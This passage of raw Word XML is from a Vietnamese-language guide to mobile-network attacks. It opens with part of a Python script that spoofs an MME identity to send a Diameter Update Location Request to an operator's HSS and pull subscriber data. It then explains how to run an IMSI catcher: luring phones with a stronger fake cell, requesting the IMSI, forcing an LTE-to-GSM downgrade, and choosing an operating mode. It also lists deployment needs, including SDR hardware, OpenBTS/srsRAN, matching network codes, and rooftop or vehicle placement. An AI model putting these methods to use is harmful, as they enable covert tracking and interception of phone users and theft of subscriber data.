        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">msg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_ulr(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    imsi_str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"452040123456789"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    origin_host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fake-mme.epc.mnc004.mcc452.3gppnetwork.org"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    origin_realm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"epc.mnc004.mcc452.3gppnetwork.org"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    dest_realm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"epc.mnc001.mcc234.3gppnetwork.org"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    dest_host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"hss.epc.mnc001.mcc234.3gppnetwork.org"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sock.send(msg)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sock.recv(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4096</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Parse ULA response để lấy Subscription-Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="52" w:name="imsi-catcher"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. IMSI Catcher</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="44" w:name="nguyên-lý-cell-selection-reselection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Nguyên Lý Cell Selection / Reselection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Điện thoại di động liên tục quét tất cả các cell khả dụng và chọn cell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“tốt nhất”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">theo thuật toán chuẩn hóa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GSM (2G) – C1/C2 criterion:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C1 = RxLev(cell) - RXLEV_ACCESS_MIN - max(0, MS_TXPWR_MAX - P)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 = C1 + CELL_RESELECT_OFFSET - TEMPORARY_OFFSET × H(PENALTY_TIME - T)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Điện thoại chọn cell có C2 cao nhất</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Fake BTS chỉ cần phát với C2 &gt; tất cả BTS thật trong vùng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LTE (4G) – RSRP/RSRQ criterion:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sreselection = Qrxlevmeas - Qrxlevmin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Điện thoại kết nối cell có RSRP cao nhất thỏa mãn cell selection criteria</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Fake eNodeB phát RSRP mạnh hơn → UE tự kết nối</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Khai thác</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: IMSI Catcher phát tín hiệu mạnh hơn → điện thoại tự</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“chọn”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kết nối vào trạm giả mà không có cảnh báo rõ ràng cho người dùng.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="giao-thức-nhận-dạng-thuê-bao"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Giao Thức Nhận Dạng Thuê Bao</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GSM – Identity Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IMSI Catcher                              Mobile Station (MS)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── RR Channel Activation ─────────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ Channel Request ────────────────────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── Immediate Assignment ──────────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ CM Service Request (TMSI=xxx) ──────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── Identity Request (type=IMSI) ──────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ Identity Response (IMSI=452040xxx) ─────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── Authentication Request (RAND) ─────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   (có thể bỏ qua bước này nếu chỉ lấy IMSI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── [Reject / Detach] ────────────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   (điện thoại tự kết nối lại vào BTS thật)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LTE – NAS Identity Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fake eNodeB                               UE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                                      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── SIB1/SIB2 (beacon, MCC/MNC) ──────►│  ← UE nghe, chọn cell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ RRC Connection Request ────────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── RRC Connection Setup ─────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ RRC Connection Setup Complete ─────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   + NAS: Attach Request (GUTI/TMSI)  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── Identity Request (IMSI) ───────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ Identity Response (IMSI) ───────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── [Attach Reject + cause] ───────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   UE re-tries with real network       │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4G Mitigation + Bypass:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 4G yêu cầu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mutual authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(mạng cũng phải xác thực với UE qua AUTN)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Tuy nhiên: UE tiết lộ IMSI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">trước</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">khi mutual auth nếu không có valid GUTI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Downgrade attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Fake eNodeB gửi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RRC Connection Release</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">với redirect đến GSM/3G → UE về GSM → IMSI Catcher hoạt động như trên GSM</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="chế-độ-hoạt-động"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Chế Độ Hoạt Động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Chế độ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mô tả</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Phát hiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Passive enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chỉ ghi IMSI, không relay → UE mất dịch vụ tạm thời</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Khó</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Active MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Relay qua mạng thật → UE có dịch vụ bình thường</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Khó hơn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">DoS mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reject tất cả Attach Request → UE no service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dễ (UE báo no signal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Downgrade MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chuyển UE về GSM A5/0, giải mã realtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rất khó</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="đầu-vào-chi-tiết"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Đầu Vào Chi Tiết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Yêu cầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ghi chú</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SDR Hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TX/RX dual-channel, dải tần phủ band mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">USRP B210 khuyến nghị</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">BTS Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OpenBTS (GSM) hoặc srsRAN (LTE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cần Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ăng-ten</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gain phù hợp (0–6 dBi omnidirectional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Directional để tập trung</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Cấu hình MCC/MNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Phải khớp với mạng mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thu từ SIB1 của mạng thật</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vị trí địa lý</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trong bán kính tác động mong muốn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tầng thượng, xe hơi, v.v.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">GPS disciplined clock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Đồng bộ timing cho LTE (±50ns)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GPS-DO hoặc GPSDO USRP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="đầu-ra-chi-tiết"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 Đầu Ra Chi Tiết</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Output per UE captured:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── IMSI (15 digits): 452-04-0123456789</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── TMSI (4 bytes, hex): 0xA3B2C1D0</w:t>
      </w:r>
      <w:r>
